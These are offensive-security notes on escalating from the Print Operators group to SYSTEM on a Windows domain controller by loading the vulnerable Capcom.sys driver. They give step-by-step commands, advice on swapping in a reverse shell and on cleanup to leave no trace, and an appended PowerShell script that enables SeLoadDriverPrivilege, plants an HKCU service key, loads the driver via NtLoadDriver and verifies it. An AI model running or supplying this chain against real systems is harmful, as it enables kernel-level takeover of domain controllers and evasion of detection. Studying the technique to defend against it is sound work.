Print Operators

ABOUT

Print Operators is another highly privileged group. Its members get SeLoadDriverPrivilege, the rights to manage, create, share and delete printers connected to a Domain Controller, and the ability to log on locally to a Domain Controller and shut it down. SeLoadDriverPrivilege is what makes the group interesting for privilege escalation: whoever can load a kernel driver can run code in ring 0, and the local-logon right means a Print Operator can do that directly on the DC.

Capcom Driver Abuse

The plan is to use the EnableSeLoadDriverPrivilege script [LINK] to enable SeLoadDriverPrivilege in our token. Then we load Capcom.sys [LINK], a signed driver that shipped as part of an anti-cheat for a Capcom game and that exposes an IOCTL letting any caller that can open its device execute arbitrary code in kernel mode. NtLoadDriver reads the driver's ImagePath from a registry service key, so we create one under HKCU (which we can write to without admin rights) pointing at Capcom.sys. Then we confirm the driver is actually loaded with DriverView [LINK]. After that is verified, we run the ExploitCapcom script [LINK], which uses the driver to steal the SYSTEM token and hand us a SYSTEM shell. Note that Capcom.sys is on Microsoft's vulnerable driver blocklist, so on hosts that enforce that list the load step will be refused.

Alternatively, if we have no GUI access, we can change the ExploitCapcom code so that it launches a reverse shell for us instead of a local command prompt.

Check privs

C:\> whoami /priv

SeLoadDriverPrivilege must appear in the list. Its State showing as Disabled is normal at this point; it only has to be present, because the next step enables it.

EnableSeLoadDriverPrivilege

C:\> .\EnableSeLoadDriverPrivilege.exe

Add Reference to Driver

Download Capcom.sys to C:\temp, then issue the commands below to add a reference to the driver under our HKEY_CURRENT_USER tree. The key goes under HKCU rather than HKLM\SYSTEM because any user can write there, and NtLoadDriver only checks that the caller holds SeLoadDriverPrivilege, not where the service key lives. ImagePath is given as an NT object path (\??\C:\temp\Capcom.sys) and Type 1 means SERVICE_KERNEL_DRIVER.

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\temp\Capcom.sys"

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify Driver

Run DriverView and confirm that Capcom.sys shows up in its list of loaded kernel modules. If it is missing, the load failed: re-check that the privilege was enabled and that the ImagePath and Type values are exactly as above.

Exploiting

Run the compiled ExploitCapcom binary. On success it spawns a new command prompt running as NT AUTHORITY\SYSTEM; confirm with whoami from that prompt.


Same stuff but automated

We can use the EoPLoadDriver [LINK] tool to automate the whole thing: it enables the privilege, creates the registry key, and calls NtLoadDriver to load the driver, all from a single command.


NO GUI

For that we need to find the ExploitCapcom.cpp source, change the string below (the command line ExploitCapcom launches once it holds the SYSTEM token, by default a local cmd.exe; point it at a reverse-shell binary instead) and recompile.


Cleanup

For a little cleanup we can unload the driver and delete the registry key we created earlier, so no trace of the CAPCOM service key is left under our HKCU hive.
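The whole procedure in PowerShell, as an added example that is not part of these notes and is not the code of EnableSeLoadDriverPrivilege, EoPLoadDriver or ExploitCapcom: check the privilege, create the HKCU service key, enable the privilege and call NtLoadDriver directly through P/Invoke (which is what EoPLoadDriver automates), verify the load by enumerating kernel modules the way DriverView does, and clean up. It assumes Capcom.sys is already at C:\temp\Capcom.sys; the class name DrvLoad and the variable names are my own. It only loads the driver; turning that into a SYSTEM shell is still ExploitCapcom's job.

```powershell
# Added example (not from the original notes or the linked tools).
# Assumes Capcom.sys already sits at C:\temp\Capcom.sys. Run as the Print Operator on the DC.
$DriverPath = 'C:\temp\Capcom.sys'
$KeyName    = 'CAPCOM'

# Hypothetical helper class (name chosen here): P/Invoke wrappers for the token,
# NtLoadDriver/NtUnloadDriver and EnumDeviceDrivers calls.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class DrvLoad {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential)] public struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }

    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES np, uint len, IntPtr prev, IntPtr ret);
    [DllImport("ntdll.dll")] static extern int NtLoadDriver(ref UNICODE_STRING path);
    [DllImport("ntdll.dll")] static extern int NtUnloadDriver(ref UNICODE_STRING path);
    [DllImport("psapi.dll", SetLastError = true)] static extern bool EnumDeviceDrivers(IntPtr[] bases, uint cb, out uint needed);
    [DllImport("psapi.dll", CharSet = CharSet.Unicode)] static extern uint GetDeviceDriverBaseName(IntPtr imageBase, System.Text.StringBuilder name, uint size);

    // Enable one privilege in our own token. Returns false when the token does not
    // hold it at all (AdjustTokenPrivileges then reports ERROR_NOT_ALL_ASSIGNED, 1300).
    public static bool EnablePrivilege(string name) {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), 0x0028 /* TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY */, out token)) return false;
        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
        tp.PrivilegeCount = 1;
        tp.Attributes = 0x2; // SE_PRIVILEGE_ENABLED
        if (!LookupPrivilegeValue(null, name, out tp.Luid)) return false;
        if (!AdjustTokenPrivileges(token, false, ref tp, (uint)Marshal.SizeOf(tp), IntPtr.Zero, IntPtr.Zero)) return false;
        return Marshal.GetLastWin32Error() == 0;
    }
    static UNICODE_STRING ToUnicode(string s) {
        UNICODE_STRING u = new UNICODE_STRING();
        u.Buffer = Marshal.StringToHGlobalUni(s);       // freed by the caller after the syscall
        u.Length = (ushort)(s.Length * 2);
        u.MaximumLength = (ushort)(u.Length + 2);
        return u;
    }
    // Both take the native registry path of the service key (\Registry\User\<SID>\...), not HKCU:\.
    public static int Load(string regPath)   { UNICODE_STRING u = ToUnicode(regPath); try { return NtLoadDriver(ref u); }   finally { Marshal.FreeHGlobal(u.Buffer); } }
    public static int Unload(string regPath) { UNICODE_STRING u = ToUnicode(regPath); try { return NtUnloadDriver(ref u); } finally { Marshal.FreeHGlobal(u.Buffer); } }
    // Base names of every loaded kernel module: the same list DriverView shows.
    public static string[] LoadedDrivers() {
        IntPtr[] bases = new IntPtr[2048]; uint needed;
        if (!EnumDeviceDrivers(bases, (uint)(bases.Length * IntPtr.Size), out needed)) return new string[0];
        int count = Math.Min((int)(needed / IntPtr.Size), bases.Length);
        var names = new System.Collections.Generic.List<string>();
        var sb = new System.Text.StringBuilder(260);
        for (int i = 0; i < count; i++) {
            sb.Length = 0;
            if (GetDeviceDriverBaseName(bases[i], sb, (uint)sb.Capacity) > 0) names.Add(sb.ToString());
        }
        return names.ToArray();
    }
}
"@

# 1. Print Operators grants SeLoadDriverPrivilege; it is listed as Disabled until we enable it, but it must be present.
if (-not ((whoami /priv) -match 'SeLoadDriverPrivilege')) { throw 'Token does not hold SeLoadDriverPrivilege' }

# 2. Service key under HKCU: writable without admin rights, and NtLoadDriver only checks the privilege, not the hive.
$hkcuKey = "HKCU:\System\CurrentControlSet\$KeyName"
New-Item -Path $hkcuKey -Force | Out-Null
New-ItemProperty -Path $hkcuKey -Name ImagePath -PropertyType String -Value "\??\$DriverPath" -Force | Out-Null
New-ItemProperty -Path $hkcuKey -Name Type      -PropertyType DWord  -Value 1 -Force | Out-Null   # 1 = SERVICE_KERNEL_DRIVER

# 3. HKCU is \Registry\User\<SID> in the native namespace, which is the path NtLoadDriver expects.
$sid    = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$ntPath = "\Registry\User\$sid\System\CurrentControlSet\$KeyName"

# 4. Enable the privilege (what EnableSeLoadDriverPrivilege.exe does) and load the driver.
if (-not [DrvLoad]::EnablePrivilege('SeLoadDriverPrivilege')) { throw 'Could not enable SeLoadDriverPrivilege' }
$status = [DrvLoad]::Load($ntPath)
'NtLoadDriver returned 0x{0:X8}' -f $status   # 0 = STATUS_SUCCESS, C0000061 = STATUS_PRIVILEGE_NOT_HELD, C0000428 = STATUS_INVALID_IMAGE_HASH (unsigned or blocklisted)

# 5. Verify the same way DriverView does: is Capcom.sys among the loaded kernel modules?
$loaded = [DrvLoad]::LoadedDrivers() -contains (Split-Path -Leaf $DriverPath)
"$(Split-Path -Leaf $DriverPath) loaded: $loaded"
# Run ExploitCapcom here while the driver is loaded.

# 6. Cleanup: unload the driver and remove the key we created.
[DrvLoad]::Unload($ntPath) | Out-Null
Remove-Item -Path $hkcuKey -Recurse -Force
```

NtLoadDriver returning 0xC0000428 is the signal that the host refuses the driver (Code Integrity or the vulnerable driver blocklist), and 0xC0000061 means the privilege was not enabled in the token that made the call; both are worth checking before blaming the registry key.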